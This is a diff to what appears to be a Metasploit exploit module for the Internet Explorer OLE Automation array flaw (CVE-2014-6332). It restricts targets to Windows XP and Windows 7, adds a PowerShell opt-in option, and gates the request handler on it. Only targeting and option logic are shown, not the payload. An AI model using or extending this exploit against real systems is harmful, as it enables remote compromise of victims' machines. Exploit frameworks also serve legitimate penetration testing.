@@ -19,8 +19,9 @@ def initialize(info={})
1919 'Name' => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution" ,
2020 'Description' => %q{
2121 This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
22- The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
23- Windows 10, and there is no patch for Windows XP or older.
22+ The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
23+ Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
24+ only target Windows XP and Windows 7 box due to the Powershell limitation.
2425
2526 Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
2627 newer Windows systems, the exploit will try using Powershell instead.
@@ -56,9 +57,9 @@ def initialize(info={})
5657 }
5758 ] ,
5859 [
59- 'Other Windows x86 ' ,
60+ 'Windows 7 ' ,
6061 {
61- 'os_name' => OperatingSystems ::Match ::WINDOWS ,
62+ 'os_name' => OperatingSystems ::Match ::WINDOWS_7
6263 }
6364 ]
6465 ] ,
@@ -84,6 +85,7 @@ def initialize(info={})
8485 register_options (
8586 [
8687 OptBool . new ( 'TRYUAC' , [ true , 'Ask victim to start as Administrator' , false ] ) ,
88+ OptBool . new ( 'AllowPowershellPrompt' , [ true , 'Allow exploit to try Powershell' , false ] )
8789 ] , self . class )
8890
8991 end
@@ -358,6 +360,11 @@ def get_html
358360 end
359361
360362 def on_request_exploit ( cli , request , target_info )
363+ if get_target . name . match ( OperatingSystems ::Match ::WINDOWS_7 ) && !datastore [ 'AllowPowershellPrompt' ]
364+ send_not_found ( cli )
365+ return
366+ end
367+
361368 case request . uri
362369 when /\. gif/
363370 if get_target . name =~ OperatingSystems ::Match ::WINDOWS_XP
0 commit comments